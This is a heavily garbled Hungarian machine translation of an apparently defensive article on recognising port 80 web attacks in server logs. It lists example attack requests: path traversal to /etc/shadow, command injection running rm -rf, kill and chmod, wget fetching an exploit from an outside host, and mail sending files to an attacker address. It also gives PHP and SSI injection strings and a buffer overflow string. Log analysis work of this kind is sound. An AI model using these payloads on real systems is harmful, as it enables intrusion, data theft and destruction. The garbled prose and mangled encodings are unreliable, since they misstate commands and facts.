I. Összefoglaló
II. Részletes leírása
III. További
IV. Begyűrűző Elemzés
V. Transcoding
VI. Következtetés
[Abstract]
honlapján 80 az alapértelmezett port szolgáltatás, a különböző biztonsági problémák továbbra is el kell engedni, még néhány ilyen biztonsági rések révén egy támadó megszerzése rendszergazdai jogosultsággal való belépéshez a helyszínen is, a következő Zenomorph 80-as port támadásokat egyes nyomok a kutatás, és megmondja, hogyan találjuk meg a problémákat napló bejegyzéseket.
[Részletek]
Itt részben a több Liezi megjelenített web szerverek és alkalmazások általános támadást, és a nyomok, amelyek csupán Liezi fő támadást, nincs összes formája a támadás, ezt a szakaszt részletes leírása a szerepe az egyes támadás, és hogyan lehet kihasználni a támadást.
(1) "." ".." És "..." kérelem
Nyomait a támadások igen gyakori a webes alkalmazások és web szerver, amely korábban lehetővé teszi egy támadó féreg vagy vírus-program módosítása a webszerver útját, hogy hozzáférhessenek a lezárt területekre. A legtöbb CGI programok ezen hibák, ".." kérést.
Példa:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Ez azt mutatja, a támadó Liezi kérelmet mosd ezt a fájlt, ha a támadó képes áttörést webszerver gyökérkönyvtárába, majd minél több információt beszerezni, és a további kiváltságokat.
(2) "% 20" kérés
20%-a hexadecimális értéket, hogy a 16 tereket, bár ez nem jelenti azt, tudod használ semmit, de ha megnézi a napló meg fogja találni, néhány webkiszolgáló alkalmazás fut, ezt a karaktert lehet hatékonyan végrehajtani Ezért érdemes alaposan felülvizsgálja a napló. Másrészről, a kérelmet néha segít végezni bizonyos parancsokat.
Példa:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Ez azt mutatja, Liezi támadók végre a UNIX parancsot, amely felsorolja a teljes katalógus a kért dokumentumokat, így a támadók hozzáférhetnek a fontos fájlokat a rendszer, hogy segítsen neki további feltételek biztosítása, a kiváltságok megszerzésének.
(3) "% 00" kérés
00% mondta a 16 byte-os hexadecimális üres, tudta, hogy bolond a webes alkalmazás, és kérje a különböző típusú fájlok.
Példák:
http://host/cgi-bin/lame.cgi?page=index.html
Ez lehet egy érvényes kérelmet a gép, ha a támadó ismeri ezt a kérést sikeres volt, s tovább keresni a cgi eljárásokat.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Talán a cgi program nem fogadja el ezt a kérést, mert ez a kérés, hogy ellenőrizze a fájl nevét toldalék, mint például: html.shtml vagy más típusú fájlok. A legtöbb program megmondja, hogy a kért fájl érvénytelen, most ez fog mondani a támadó kérelmeket a fájlt kell egy karakter egy fájltípus utótagot, így a támadó kap a rendszer elérési útvonal, fájlnév, ami A rendszert az érzékeny információk
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Figyelmet erre a kérésre, akkor megcsal cgi programot, hogy ez a dokumentum meghatározása elfogadható fájltípusokat, néhány alkalmazás a hatékony ellenőrzések, mint a hülye kérést a dokumentum, ez a támadás a közös módszertan kidolgozásában.
(4) "|" kérés
Ez egy olyan cső jellegű, a unix rendszer, a kérelem segítséget végrehajtása több rendszer parancsokat egyszerre.
Példa:
# Cat access_log | grep-i ".."
(Ez a parancs megjeleníti a log-ban a ".." kérést, általánosan használt, a támadások és férgek találtam)
Gyakran úgy találja, hogy sok webes alkalmazás használja ezt a karaktert, ez azt is eredményezi, hogy téves riasztás az IDS naplók.
A gondos vizsgálatát a kérelem, hogy az előnnyel jár, csökkenti a téves riasztások behatolásjelző rendszerek.
Itt van néhány Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Ez a kérés parancs, a következő néhány változtatást Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20%-al 20/etc |
Ez a kérés szerepel a UNIX rendszer / etc könyvtárban az összes fájlt
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20% 20-i "béna"
A macska parancs végrehajtását kérelmet és a grep parancs végrehajtása is, nézd meg a "sánta"
(5) "," kérés
A unix rendszerekben, ez a jellege lehetővé teszi több parancs végrehajtását
Példa:
Id #, uname-a
(Végrehajtása id parancsot, majd végrehajtása a uname parancs)
Egyes internetes program ezt a karaktert, vezethet el IDS naplók a figyelmeztető hiba, gondosan ellenőrizze az internetes programot, így csökkenti a kudarc kockázata az IDS figyelmeztető jelzések.
(6) " " és " " Request
Ellenőriznie kell a naplók rögzítik a két karakter, több okból, az első a karaktert, hogy a kiegészítő adatokat a dokumentumban
1. példa:
# Echo "a hax0red H0 H0" / etc / motd (motd kérésére írásos tájékoztatást ebben a dokumentumban)
A támadó könnyen használja a kérelmet a fenti meghamisítása weboldal. Mint például a híres RDS kihasználni a támadók gyakran használják a változás a weboldalt.
2. példa:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html észre fogod venni, hogy a nyelvi jelek itt, ő is töltött " "," " karakter, az ilyen támadások nem okoz a támadó számára, hogy hozzáférjenek a rendszerhez, hogy megzavarodott emberek azt hiszik, ez egy legitim webhely információkat (ami a keresik fel ezt a linket, hogy látogassa meg a támadó meg a címet, ezt a kérést lehet kódolva a 16 hexadecimális karakter formában, annak érdekében, hogy a támadás nyomai nem olyan egyértelmű)
(7) "!" Request
Közös nyelv az ilyen jellegű kérés SS (Server Side Include) I támadást, ha a támadó egy támadó összekeverik a felhasználó rákattint a hivatkozásra meg, és ugyanaz, mint fent.
Példa:
http://host1/something.php =
A Lieh-tzu a támadás lehet csinálni, hogy egy webhely fájlt host2 származó host1 felett jelenik meg (természetesen a szükséges látogatók látogassa meg a támadó kapcsolat beállításait. Ezt a kérelmet át lehet váltani 16 hex kódolás maszk, nem könnyen találtam)
Ugyanakkor, ez a megközelítés is végre a parancsot hatóság honlapján
Példa:
http://host/something.php =
A Lieh-futnak a távoli rendszer "id" paranccsal, ez jelenik meg a weboldal felhasználói azonosító, általában a "senki" vagy "www"
Ez a forma lehetővé teszi a rejtett fájlokat is.
Példa:
http://host/something.php =
A rejtett fájlok. Htpasswd nem jelenik meg, Apache nem fogja megállapítani az ilyen szabályok. Ht az igénylőlap, és SSI logo megkerülik ezeket a korlátozásokat, és a vezető biztonsági problémák
(8) "," kérés
Az ilyen támadások használják, hogy megpróbálja távolról beszúrni egy PHP webalkalmazás eljárások felhatalmazhatja az végrehajtására order, attól függően on szerverbeállítások megadásához és egyéb tényezők a munka (például a php van állítva, hogy biztos mode)
Példa: http://host/something.php = passthru (id ");?
Néhány egyszerű php alkalmazás, akkor lehet, hogy honlapján a távoli rendszer felhasználói jogokkal teljesíteni a helyi irányító
(9) "" "kérés
Ez a karakter a későbbiekben használt parancsokat futtat a perl, a karaktereket a webes alkalmazás nem gyakran használt, tehát ha látod, hogy az a fatörzs, nagyon oda kell figyelniük
Példa:
http://host/something.cgi = `id`
Írj egy perl cgi program az adott vezetne végrehajtásának id parancs
[További]
A következő szakaszban történő végrehajtását tárgyalja több támadást is követel, valamint a kért dokumentumokat, és ha egy távoli parancs végrehajtás hibája, meg kell, hogyan lehet ellenőrizni a felfedezés. Ez a rész csak kapsz egy jó ötlet, és mondd meg a rendszert, mi történik, a támadók próbálják támadni a rendszer nyomai, de nem sorolja fel az összes, a támadó számára, hogy használja a parancsok és kéri.
"/ Bin / ls"
Ez a parancs arra kéri a teljes utat, sok webes alkalmazás rendelkezik ezzel a kiskaput, ha be sok helyen az ilyen kérelmet, hogy lehetőség van a nagy távoli parancs végrehajtás biztonsági rés, de nem feltétlenül probléma is lehet a téves riasztás. Még egyszer emlékeztette, webalkalmazás írásbeli (cgi, asp, php ... stb) az alapja a biztonság
Példa:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Ez egy ablak a héj, ha a támadók hozzáférhetnek, és futtassa ezt a szkriptet a kiszolgáló beállításait feltételek mellett engedélyezett ablakok gép mindent tud, sok férgek keresztül 80-as port, a kommunikáció a távoli gép
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Ez két bináris fájlokat, a problémák és a / bin / ls, mint például, ha be sok helyen az ilyen kérelmet, hogy lehetőség van a nagy távoli parancs végrehajtás biztonsági rés, de nem feltétlenül probléma is lehet a téves riasztás.
Most derül ki, amely része tartozik, amely a felhasználói és csoport
Példa:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Ez a parancs töröl fájlokat nélkül a helyes használata nagyon veszélyes
Példák:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20% 20-rf * |
http://host/cgi-bin/bad.cgi?doh=rm% 20% 20-rf *;
"Wget és tftp" követel
Ezek a parancsok gyakran a támadó tehet szert további kiváltságokat fájlok letöltésére, wget egy unix parancs alapján, lehet hozzászokott letölt hátsóajtó, tftp alatt a parancs UNIX és NT, használja a fájl letöltéséhez. Néhány IIS férgek terjedését magukat tftp másolni a vírus a többi gép
Példák:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// host / cgi-bin / bad.cgi? doh = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Macska" parancs
Ez a parancs a megtekintéséhez a fájl tartalmát, használt olvassa el a fontos információkat, mint például a konfigurációs fájl, jelszó kép, hitel-fájlok és dokumentumok tud gondolni
Példák: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? doh = macska% 20/etc/motd;
"Echo" parancs
Ez a parancs használható adatot írni a fájlt, mint például a "index.html"
Példák: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-kivi #% 20was% 20here"% 20 % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-kivi #% 20was% 20here"% 20 % 200day.txt;
"Ps" parancs
Felsorolja a jelenleg futó, mondja, hogy a támadó egy távoli gépen fut a szoftver annak érdekében, hogy néhány ötletet a biztonsági kérdésekre, a további engedélyek beszerzése
Példák: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? doh = ps-aux% 20;
"Öld meg, és killall" követel
Unix rendszerek annak érdekében, hogy megöl ez a folyamat, egy támadó használhatja ezt a parancsot, hogy állítsa le a szolgáltatások és folyamatok is törli a nyomait a támadó néhány kihasználni fog a sok gyermek folyamatok
Példák: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" parancs
Ez a parancs utasítja a támadó a távoli gép nevét, egy ideig, ezen a webhelyen keresztül annak érdekében, hogy tudja, melyik isp, a támadó, aki lehet ma látogatható. Uname-a kérje általában, ezek rögzítik a naplófájl
Példák: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? doh = uname% 20-a;
"Cc, gcc, perl, python, stb ..." összeállítása / értelmezése a parancs
Támadó keresztül wget vagy tftp letöltés kihasználják, és használja a cc, gcc fordító lefordítani ezt a végrehajtható program, és a további hozzáférési jogosultságok
Példák: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Ha megnézed a naplókat található "perl" python "Ezek az utasítások lehetnek egy távoli támadó számára, hogy letölt perl, python script, és megpróbálta a kiváltságokat a helyi
"Mail" parancs
Támadók gyakran használja ezt a parancsot rendszer néhány fontos dokumentumot a támadó saját postafiókot, hanem hajlandó e-mail bombatámadásokat hajtanak végre
Példák: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, stb ..." és egyéb parancsok
Unix rendszerek annak érdekében, hogy lehetővé teszi számukra, hogy változtassa meg a fájl jogosultságok
chown = beállítás lehetővé teszi a fájl tulajdonosa chmod = lehetővé teszi, hogy hozzanak fájlengedélyek chgrp = lehetővé teszi, hogy módosítsuk a csoport engedélyeit kép chsh = változtathat a felhasználó shell
Példák: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? doh = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" fájl
Ez a rendszer a jelszó fájl, általában árnyék ki, és nem teszi lehetővé, hogy see a titkosított jelszó, de 1 támadó lehet tudni, what is érvényes felhasználó, és a rendszer abszolút elérési út, weboldal neve és egyéb információk, mint usually az árnyék ki, így a támadó általában az / etc / shadow fájlban
"/ Etc / master.passwd"
Ez a fájl a BSD rendszer jelszó fájl tartalmazza a titkosított jelszó, a fájlt a root fiók csak a csak olvasható, és néhány képzetlen támadók nyitotta meg beolvasta a belső tartalom., Ha a weboldal root jogosultsággal fut, akkor a támadó is, tudjuk olvasni a tartalmát belül, egy csomó probléma a rendszergazda jön egymás után
"/ Etc / shadow"
Tartalmaz egy jelszót titkosított rendszer, olvassa el ugyanazt a root, és / et / master.passwd szinte
"/ Etc / motd"
Amikor a felhasználók bejelentkeznek a UNIX-rendszer, az információ megjelenik, a "Message of the Day" fájlt, hogy fontos rendszer információkat és adminisztrátor felhasználóinak egy készülék, a felhasználók, akik szeretnének látni, akik nem, is tartalmaz a rendszer verziószáma információk, a támadó általában lásd ezt a fájlt, hogy megértsék, milyen rendszer fut a támadó, a következő lépés az, hogy keressen ilyen típusú rendszer, kihasználják, és a további hozzáférést a rendszer kiváltságok
"/ Etc / hosts"
A dokumentum előírja, IP cím és hálózati információk, a támadó is többet szeretne tudni a rendszer hálózati beállítások
"/ Usr / local / apache / conf / httpd.conf"
Ez egy Apache webszerver konfigurációs fájl, a támadó meg tudja érteni, mint a cgi, SSI és egyéb információ elérhető
"/ Etc / inetd.conf"
Ez a konfigurációs fájl inetd szolgáltatás, a támadó meg tudja tanulni a távoli gépen, ezek a szolgáltatások elindításához, hogy használja-e a wrapper való hozzáférés ellenőrzését, ha a wrapper találtak fut, a támadó a következő lépés a csekk "/ etc / hosts.allow" és a "/ etc / hosts.deny", file, és amelyek változhatnak bizonyos beállításait, a hozzáférési jogosultságokat
". Htpasswd,. Htaccess, és a. Htgroup"
Ezek a fájlok általában alkalmazott weboldal felhasználói hitelesítés, a támadónak véli ezeket a fájlokat, és kap a felhasználó név és jelszó, a jelszó fájl. Htpasswd titkosított is, révén néhány egyszerű program visszafejtés csapkod, lehetővé teszi a támadónak, aki az oldalon a védett területek (általában a felhasználó ugyanazt a felhasználói név és jelszó, a támadó akár látogat más számla)
"Access_ és error_log"
Ezek az Apache szerver log fájlokat, a támadók gyakran a fájlok megtekintéséhez, nézd meg a kérés tartják nyilván, ezek és egyéb kérelmeket a különböző helyeken
Általában a támadó módosíthatja ezeket a log fájlokat, mint például a saját cím, a támadó keresztül a 80-as porton keresztül a rendszer és a biztonsági rendszert is, nem működik, nincs más rekord program nyilvántartási rendszer állapotát, amely behatolásjelző nagyon nehézzé válik, hogy a munka
"[Drive-levél]: winntrepairsam._ vagy [meghajtóbetűjel]: winntrepairsam"
Windows NT rendszergazda jelszavát fájlt, ha a távoli parancs nem hajtható végre, támadók általában kérésre ezeket a dokumentumokat, majd a "l0pht kiváló", hogy milyen típusú jelszót csinos eszközök kiváló, ha a támadó megpróbálja támadni ügyintéző 'jelszó fájl, ha sikeres, akkor a távoli gép lesz a támadó kap ellenőrzési
[Túlfolyó elemzés]
Ebben a cikkben nem mondom, hogy túl sokat a túlcsordulás a téma, adok arra, hogy melyek ezek a jelenségek és nyomokban a figyelemre méltó és különös aggodalomra ad okot, a puffer gyakran támadja meg a támadó kódot átalakítását és nehezen talál más módon elérni
Itt van egy egyszerű Lie Zi
Példa: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Ez Liezi azt mutatja, hogy a támadó egy kérelmet küld egy csomó karakter, a vizsgálati program egy puffer túlcsordulás, puffer túlcsordulás kaphat egy távoli parancs végrehajtását fogadó engedélyeket, ha a tulajdonos a setuid és eljárásokat a gyökér, keresztül a túlfolyó, kaphat hozzáférést az egész rendszer, ha nem tetszik setuid program, akkor a túlcsordulási csak a futás a weboldal felhasználói jogok
Az itt nem mondhatom minden körülmények között, de rendszeresen ellenőrizze a log file, if that day hirtelen talált egy csomó of kér, de általában nem more, mint kérésének, akkor means are to kitéve túlcsordulás támadások, természetesen, szintén Az új hálózati féreg támadás
[Átkódolás]
Minden támadások fent említett kérelem, a támadó általában tudja, IDS rendszerek gyakran mechanikai ellenőrzés kérésére, általában a támadó használja adatkonverzió szerszám-hoz megtérít a kért tartalom formátum 16 zenekar, ami IDS figyelmen kívül hagyja ezeket a kérelmeket, Ismerjük a CGI rés fürkésző szerszám, hogy van egy jó Liezi Pofaszakáll. Ha megnézed a napló az idő talált nagyszámú 16-sáv és nem valami közönséges karakter, akkor a támadó esetleg Bizonyos módon támadást a rendszer
A gyors módja van a naplófájl a kérelmet a 16 hex, másolja a böngésző, a böngészőben lehet alakítani a megfelelő kérelmet, és megjelenik a kérelem tartalma, ha nem bátorságot, hogy ezt a kockázatot, egy egyszerű ember ASCII, nem az Ön számára a megfelelő kódot.
[Következtetés]
A cikk nem lehet minden 80 port a támadás, de a legtöbb már hivatkoztak, mint a more az általános támadás, és mondd you Hogyan ellenõrizd le log fájlokat, és hogyan kell hozzáadni, as egyes IDS rules, írja her cél web rendszergazdának kell az érintett mi a jó ötlet, ugyanakkor, remélem, ez a cikk segít az internetes program webfejlesztők írni jobb programok
A MEGJEGYZÉS: Ha bármilyen észrevételeiket és javaslataikat, kérjük, küldjön egy e-mail admin@cgisecurity.com.